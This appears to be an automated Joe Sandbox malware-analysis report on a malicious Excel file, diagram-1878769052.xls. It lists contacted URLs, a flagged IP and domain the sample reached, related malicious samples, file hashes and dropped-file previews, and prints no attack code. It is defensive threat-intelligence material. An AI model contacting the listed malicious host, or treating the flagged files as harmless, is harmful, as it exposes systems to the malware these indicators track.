                                                                                                                                    https://api.powerbi.com/beta/myorg/imports3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://devnull.onenote.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://ncus.pagecontentsync.3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://messaging.office.com/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://augloop.office.com/v23C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://skyapi.live.net/Activity/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://clients.config.office.net/user/v1.0/mac3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://dataservice.o365filtering.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://api.cortana.ai3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://onedrive.live.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://ovisualuiapp.azurewebsites.net/pbiagave/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://visio.uservoice.com/forums/368202-visio-on-devices3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://directory.services.3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://login.windows-ppe.net/common/oauth2/authorize3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://staging.cortana.ai3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          192.185.195.245
                                                                                                                                                          hallakjewelry.comUnited States
                                                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                          Analysis ID:441941
                                                                                                                                                          Start date:29.06.2021
                                                                                                                                                          Start time:18:27:06
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 4m 33s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:light
                                                                                                                                                          Sample file name:diagram-1878769052.xls
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                                          Number of analysed new started processes analysed:18
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal84.troj.expl.evad.winXLS@5/7@2/1
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:Failed
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found application associated with file extension: .xls
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          Warnings:
                                                                                                                                                          Show All
                                                                                                                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.64.90.137, 23.211.6.115, 52.109.88.177, 52.109.8.23, 52.109.12.24, 104.42.151.234, 20.82.210.154, 20.54.7.98, 20.54.104.15, 40.112.88.60, 205.185.216.42, 205.185.216.10, 80.67.82.211, 80.67.82.235, 20.50.102.62
                                                                                                                                                          • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/441941/sample/diagram-1878769052.xls

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          No simulations

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          192.185.195.245diagram-1878769052.xlsGet hashmaliciousBrowse
                                                                                                                                                            diagram-586589391.xlsGet hashmaliciousBrowse
                                                                                                                                                              diagram-586589391.xlsGet hashmaliciousBrowse
                                                                                                                                                                diagram-816901094.xlsGet hashmaliciousBrowse
                                                                                                                                                                  diagram-816901094.xlsGet hashmaliciousBrowse
                                                                                                                                                                    diagram-90301250.xlsGet hashmaliciousBrowse
                                                                                                                                                                      diagram-90301250.xlsGet hashmaliciousBrowse

                                                                                                                                                                        Domains

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        hallakjewelry.comdiagram-586589391.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        diagram-586589391.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        diagram-816901094.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        diagram-816901094.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        diagram-90301250.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        diagram-90301250.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245

                                                                                                                                                                        ASN

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        UNIFIEDLAYER-AS-1USdiagram-1878769052.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        statistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 108.179.232.80
                                                                                                                                                                        statistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 108.179.232.80
                                                                                                                                                                        4dvYb6Nq3y.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 50.87.238.189
                                                                                                                                                                        Remittance.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.120.180
                                                                                                                                                                        SecuriteInfo.com.Trojan.Win32.Save.a.27842.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.164.148
                                                                                                                                                                        SEOCHANG INDUSTRY Co., Ltd..exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.24.206
                                                                                                                                                                        7R9igRpuL4.msiGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.0.218
                                                                                                                                                                        nxinF8KuKS.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.16.56
                                                                                                                                                                        242jQP4mQP.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 50.87.248.20
                                                                                                                                                                        Halkbank.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.0.218
                                                                                                                                                                        HBenKsn2R8.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 96.125.162.104
                                                                                                                                                                        DC Viet Nam Order list 6-25-21.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.144.0.158
                                                                                                                                                                        Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 108.167.156.42
                                                                                                                                                                        plan-1053707320.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 50.116.92.246
                                                                                                                                                                        plan-1053707320.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 50.116.92.246
                                                                                                                                                                        factura y factura de la v#U00eda a#U00e9rea.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 74.220.199.6
                                                                                                                                                                        T5gtQGRL8u.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.135.156
                                                                                                                                                                        PO 74230360.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.114.107
                                                                                                                                                                        PO 74230360.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.241.114.107

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19statistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        Bank_ details.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        prijenos SWIFT za partiju 220000000001182910.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        PO29012021,pdf.ppamGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        OFfcxY5xia.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        k72fFnCoEX.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        DWJn18MuX6.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        sp7UUM849P.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        CL2SJ8-LYGF7Z-SEJ2QPPAPL.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        AqZrR9upiM.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        iduD2A1.dllGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        E6973qZ1cV.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        97FC461FD24104740310BD741F7F8EBF489E640AA93A0.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        Tu33yM3ZKj.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        BNK1135000001.docxGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        message_zdm.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        Financial Statements.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        Wilson-McShane Corporation ACH.xlsxGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        Dfdvfczl_Signed_.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245
                                                                                                                                                                        9irkb5Rbn8.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 192.185.195.245

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        No context

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3C836C47-4F20-4ACD-A373-FE45E87498F5
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):135209
                                                                                                                                                                        Entropy (8bit):5.363063821175687
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:JcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:dEQ9DQW+zwXO1
                                                                                                                                                                        MD5:EC3B0743FC28C8E80BE8E85BF2D3B49C
                                                                                                                                                                        SHA1:F3AFD5D06F1EF83239F9DBCFEDAA3E82D7B971E6
                                                                                                                                                                        SHA-256:B10B974159F945692DE4245A74A92AF19FA6A588B9E61EA299420BCF92380197
                                                                                                                                                                        SHA-512:676C1D9EE522D1EB917319F66205142A751969C1A22C818195B9611230EB28EDD9BB221A8E490C4C3B1ECCC0A3A7A73E75AAEE38F16A310D9D2C0DEF16046A89
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-29T16:28:00">.. Build: 16.0.14228.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\D7B40000
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):81728
                                                                                                                                                                        Entropy (8bit):7.903508224175571
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:bMCB8zQP16QCI/UyfqKdpkatlASfkuZHMqCVxI118t1oHN9IKb:bNP16QjJfVkZGp1Su18t1oHNN
                                                                                                                                                                        MD5:1AAE9170F9650321D1EDE8446ED69E62
                                                                                                                                                                        SHA1:FE08C76F03E1C4FFDD3142944A95996439EEC606
                                                                                                                                                                        SHA-256:9C884CD661FF266D2D2C3244046DB797D7A0AD74D06884FB7641B11D938F8458
                                                                                                                                                                        SHA-512:8F22DB18A506A3ADDCF32B02444EE20281E038C763E4BA0AB4ACA5608FE3AB72846B9C77D63A8DE642199FC0C3615B63C802D9DA96AE62BEB466E7F0148A51D1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: .U.N.0.}G.....J\@Z!....w.`?....U..1..=c7..JK)...'s.3.x|...z.....7#V..^i....u}.*L.)a...-.......n..+.v.>.p.9......p...hE.... .\t.OF._\z...:e.6._.L.T]-hy.d...~...T-.!.-E"....w$......%..C....H.4!jb.......o...{.m..7gD0......2K)..?...r.c........T7".?.[|a......f;H6.b....).5V........Y.......?A.v.l._.....Qt.B....b........c..t........\..g..a'...........6..].k..:T..Y.....}...K3.&..4.#....D..u .I.z.m..kF......@m...<.......PK..........!.[:..............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Jun 29 15:28:02 2021, atime=Tue Jun 29 15:28:02 2021, length=8192, window=hide
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):904
                                                                                                                                                                        Entropy (8bit):4.664189479719172
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:8JfXUM+lzjduCH2KOtd342scR+WrjAZ/DYbD9SeuSeL44t2Y+xIBjKZm:8J4zxitN3AZbcDz7aB6m
                                                                                                                                                                        MD5:A3D4465FB4FA6417CAD47967513FDDB4
                                                                                                                                                                        SHA1:087D7A064B3259FBB1EEAE8D3B0AD5D22B7FBB56
                                                                                                                                                                        SHA-256:0DE09FB970639B2273509C9D9355CEE562287A4C84DF222F4CFD32B272598DE2
                                                                                                                                                                        SHA-512:3029F2EB55F00990AE768BE27150531727BE97E203032996DF2ECD1E9D4E7C560B9D5DC00F706ED0897E75D7917F10D953CD38E59AB542A25B9E3EB66940E2F5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: L..................F.............-...MI..m....F..m... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rt.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...Rt.....#J....................Q...j.o.n.e.s.....~.1......R....Desktop.h.......N...R.......Y..............>......C..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......992547...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\diagram-1878769052.LNK
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:52 2020, mtime=Tue Jun 29 15:28:02 2021, atime=Tue Jun 29 15:28:02 2021, length=174592, window=hide
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2190
                                                                                                                                                                        Entropy (8bit):4.719930747057183
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:8hitFFRQYWnxiBB6phitFFRQYWnxiBB6:8hitjRQ/cKhitjRQ/c
                                                                                                                                                                        MD5:C10AB27FC43830657A472B57F330E2D6
                                                                                                                                                                        SHA1:CF4231FFDE0BF42143EBCBAC87FA270E9CE8D91F
                                                                                                                                                                        SHA-256:48EE3D7BDF0A11D170E85231C42FE4DFE72BCAC3C1FDD1F56BFFBEB208A3AA92
                                                                                                                                                                        SHA-512:E74A1B3F2D7642FDF3167C3114E6164D8B57044AAC76224F9D3C9A244B72D2DE1453341BDF5BD28E84BCA88F9CC4E8C596E524FF4B1B84566D87ED538CF44FD6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: L..................F.... ....{.S......Y..m....Y..m...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rt.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...Rt.....#J....................Q...j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...Rt......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2..,...R{. .DIAGRA~1.XLS..^......>Q{<.R{......V....................u...d.i.a.g.r.a.m.-.1.8.7.8.7.6.9.0.5.2...x.l.s.......\...............-.......[...........>.S......C:\Users\user\Desktop\diagram-1878769052.xls..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.i.a.g.r.a.m.-.1.8.7.8.7.6.9.0.5.2...x.l.s.........:..,.LB.)...As...`.......X.......992547...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.
                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):107
                                                                                                                                                                        Entropy (8bit):4.851195869560029
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:oyBVomMXCUUkQN6lZFdUkQN6lmMXCUUkQN6lv:dj6XCvkQS8kQ6XCvkQy
                                                                                                                                                                        MD5:027E2AFCDD06DD3DF9CC94970FC294A4
                                                                                                                                                                        SHA1:C1F15C35ADF3EA115CA99740EEF8927F35C05154
                                                                                                                                                                        SHA-256:94AC427E287B5A0C4A4017D90BAB2D66485AC0A211640CA0CDD0687CB087CC93
                                                                                                                                                                        SHA-512:4456E497CCAD37068DA4AB5C12F547B1D36B749823F48674466565B92E7C927B1F830574BD51691B66B84136097D413B916E038F5BF09C8D4FB70C2D3CDB954A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: Desktop.LNK=0..[xls]..diagram-1878769052.LNK=0..diagram-1878769052.LNK=0..[xls]..diagram-1878769052.LNK=0..
                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):22
                                                                                                                                                                        Entropy (8bit):2.9808259362290785
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                        MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                        SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                        SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                        SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                        Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                        C:\Users\user\Desktop\B8B40000
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):209068
                                                                                                                                                                        Entropy (8bit):5.656573528870952
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:3rNbP1vQjFfVkdG2fQPGVTPduUzvWnb+quX/DXfXbwXdrNRPi:xP1mfVUNRwXRPi
                                                                                                                                                                        MD5:170E97A7A4712CC4CC25FFFAF8B6E789
                                                                                                                                                                        SHA1:CB6AE55413CBE249566E5DEC1A90598751909159
                                                                                                                                                                        SHA-256:E34B19A41C8DBC4253EA79D6FE7D4467E3174F59415FC18D6933189DA0C04BE7
                                                                                                                                                                        SHA-512:94E4EF01EDE4551399D1983C86151CC8FA229FD6D1FF595D50D98F9D7F766EB0C5A51739EF25A0B2EAA458D5CC3DB55EEC533CB4A0C0E00D76393EABA29248F9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9..8.......X.@...........".......................1................P..C.a.l.i.b.r.i.1................P..A.r.i.a.l.1................P..A.r.i.a.l.1................P..A.r.i.a.l.1................P..C.a.l.i.b.r.i.1...h...8........P..C.a.m.b.r.i.a.1...,...8........P..A.r.i.a.l.1.......8........P..A.r.i.a.l.1.......8........P..A.r.i.a.l.1.......<........P..A.r.i.a.l.1.......4........P..A.r.i.a.l.1.......4........P..A.r.i.a.l.1................P..C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Grog, Last Saved By: Grog, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 20 08:01:36 2021, Security: 0
                                                                                                                                                                        Entropy (8bit):2.078617301736935
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                        File name:diagram-1878769052.xls
                                                                                                                                                                        File size:535552
                                                                                                                                                                        MD5:5dc0dbb9a817db4a5f589f670c6b9241
                                                                                                                                                                        SHA1:6e51ed7744080f5583beb20fd7052e2fcbf7cd3a
                                                                                                                                                                        SHA256:22c8c25451ead7742914a869f775af6e8751907a83b46077b8439d03a9105c81
                                                                                                                                                                        SHA512:ee37b3b4c2ba204b542a091104bda6f1a0097a17e131a79edf48f7fe3941d36df248bfd0c2dcc4c7d075abdc82730668587fa68e739175d58c0b5e9688edb260
                                                                                                                                                                        SSDEEP:1536:pq35xFlHVRl1X/7fi18snt52U20kyti4kmhRd+s2tebLxtf7t69KRGF:pq35xFl1Rl1Pas+ilmhR4s2tQVtfgDF
                                                                                                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                        Static OLE Info

                                                                                                                                                                        General

                                                                                                                                                                        Document Type:OLE
